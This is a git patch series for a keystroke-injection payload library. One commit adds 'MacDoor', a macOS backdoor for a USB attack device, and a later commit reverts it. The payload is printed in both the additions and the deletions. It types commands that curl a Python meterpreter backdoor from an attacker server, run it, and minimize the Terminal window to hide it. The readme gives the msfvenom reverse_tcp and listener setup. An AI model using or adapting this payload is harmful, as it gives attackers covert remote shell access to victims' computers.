From 5ec93761fda8d3b75feff5aee09eaf47aad7220f Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Thu, 31 Aug 2023 00:39:59 +0200 Subject: [PATCH 1/2] Create MacDoor - A Python Backdoor for MacOS (#662) * Add files via upload * Update readme.md * Add files via upload * Update readme.md * Update payload.txt --- .../library/execution/MacDoor/payload.txt | 47 +++++++++++++++++++ payloads/library/execution/MacDoor/readme.md | 30 ++++++++++++ .../library/remote_access/MacDoor/payload.txt | 47 +++++++++++++++++++ .../library/remote_access/MacDoor/readme.md | 30 ++++++++++++ 4 files changed, 154 insertions(+) create mode 100644 payloads/library/execution/MacDoor/payload.txt create mode 100644 payloads/library/execution/MacDoor/readme.md create mode 100644 payloads/library/remote_access/MacDoor/payload.txt create mode 100644 payloads/library/remote_access/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt new file mode 100644 index 00000000..4c5038fc --- /dev/null +++ b/payloads/library/execution/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Execution +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md new file mode 100644 index 00000000..5e82e9cc --- /dev/null +++ b/payloads/library/execution/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for the BashBunny + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Execution + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt new file mode 100644 index 00000000..3ed7bfc7 --- /dev/null +++ b/payloads/library/remote_access/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Remote Access +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md new file mode 100644 index 00000000..7fd07093 --- /dev/null +++ b/payloads/library/remote_access/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for MacOS + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Remote Access + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + From f729050548f28ca7a307fdaac31c3b846c593341 Mon Sep 17 00:00:00 2001 From: Dallas Winger <9642419+dallaswinger@users.noreply.github.com> Date: Mon, 18 Sep 2023 12:50:10 -0400 Subject: [PATCH 2/2] Revert "Create MacDoor - A Python Backdoor for MacOS (#662)" This reverts commit 5ec93761fda8d3b75feff5aee09eaf47aad7220f. --- .../library/execution/MacDoor/payload.txt | 47 ------------------- payloads/library/execution/MacDoor/readme.md | 30 ------------ .../library/remote_access/MacDoor/payload.txt | 47 ------------------- .../library/remote_access/MacDoor/readme.md | 30 ------------ 4 files changed, 154 deletions(-) delete mode 100644 payloads/library/execution/MacDoor/payload.txt delete mode 100644 payloads/library/execution/MacDoor/readme.md delete mode 100644 payloads/library/remote_access/MacDoor/payload.txt delete mode 100644 payloads/library/remote_access/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt deleted file mode 100644 index 4c5038fc..00000000 --- a/payloads/library/execution/MacDoor/payload.txt +++ /dev/null @@ -1,47 +0,0 @@ -#!/bin/bash -# -# Title: MacDoor -# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. -# Author: afsh4ck -# Version: 1.0 -# Target: MacOS -# Category: Execution -# -# Steps: -# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -# Step 2: mount a local server 'python3 -m http.server' -# Step 3: msfconsole multi/handler listener open before the attack. -# -# Note: -# You need to modify the script with your attacker IP and the port or your local server. -# -# Purple.............Setup -# Yellow blink.......Attack Mode ON -# Green..............Finish - -LED SETUP -ATTACKMODE HID STORAGE ECM_ETHERNET -LED ATTACK - -# Open terminal -QUACK GUI SPACE -QUACK DELAY 500 -QUACK STRING Terminal -QUACK ENTER -QUACK DELAY 3000 - -# Execute attack -QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py -QUACK ENTER -QUACK DELAY 1000 -QUACK STRING cd Downloads -QUACK ENTER -QUACK STRING python3 backdoor.py -QUACK ENTER - -# Minimize terminal -QUACK GUI m -QUACK DELAY 2000 - -# Standby -LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md deleted file mode 100644 index 5e82e9cc..00000000 --- a/payloads/library/execution/MacDoor/readme.md +++ /dev/null @@ -1,30 +0,0 @@ -# MacDoor - Python Backdoor Execution for the BashBunny - -``` - __ ___ ____ - / |/ /____ _ _____ / __ \ ____ ____ _____ - / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ - / / / // /_/ // /__ / /_/ // /_/ // /_/ // / -/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ -``` - -* Author: afsh4ck -* Version: 1.0 -* Target: MacOS -* Tested on: Ventura 13.3.1 -* Category: Execution - -# DESCRIPTION - -Download a Python backdoor from our server, run it in terminal and minimize the terminal window. - -# STEPS - -* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -* Step 2: mount a local server 'python3 -m http.server' -* Step 3: msfconsole multi/handler listener open before the attack. - -# NOTE - -* You need to modify the script with your attacker IP and the port or your local server. - diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt deleted file mode 100644 index 3ed7bfc7..00000000 --- a/payloads/library/remote_access/MacDoor/payload.txt +++ /dev/null @@ -1,47 +0,0 @@ -#!/bin/bash -# -# Title: MacDoor -# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. -# Author: afsh4ck -# Version: 1.0 -# Target: MacOS -# Category: Remote Access -# -# Steps: -# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -# Step 2: mount a local server 'python3 -m http.server' -# Step 3: msfconsole multi/handler listener open before the attack. -# -# Note: -# You need to modify the script with your attacker IP and the port or your local server. -# -# Purple.............Setup -# Yellow blink.......Attack Mode ON -# Green..............Finish - -LED SETUP -ATTACKMODE HID STORAGE ECM_ETHERNET -LED ATTACK - -# Open terminal -QUACK GUI SPACE -QUACK DELAY 500 -QUACK STRING Terminal -QUACK ENTER -QUACK DELAY 3000 - -# Execute attack -QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py -QUACK ENTER -QUACK DELAY 1000 -QUACK STRING cd Downloads -QUACK ENTER -QUACK STRING python3 backdoor.py -QUACK ENTER - -# Minimize terminal -QUACK GUI m -QUACK DELAY 2000 - -# Standby -LED FINISH diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md deleted file mode 100644 index 7fd07093..00000000 --- a/payloads/library/remote_access/MacDoor/readme.md +++ /dev/null @@ -1,30 +0,0 @@ -# MacDoor - Python Backdoor Execution for MacOS - -``` - __ ___ ____ - / |/ /____ _ _____ / __ \ ____ ____ _____ - / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ - / / / // /_/ // /__ / /_/ // /_/ // /_/ // / -/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ -``` - -* Author: afsh4ck -* Version: 1.0 -* Target: MacOS -* Tested on: Ventura 13.3.1 -* Category: Remote Access - -# DESCRIPTION - -Download a Python backdoor from our server, run it in terminal and minimize the terminal window. - -# STEPS - -* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -* Step 2: mount a local server 'python3 -m http.server' -* Step 3: msfconsole multi/handler listener open before the attack. - -# NOTE - -* You need to modify the script with your attacker IP and the port or your local server. -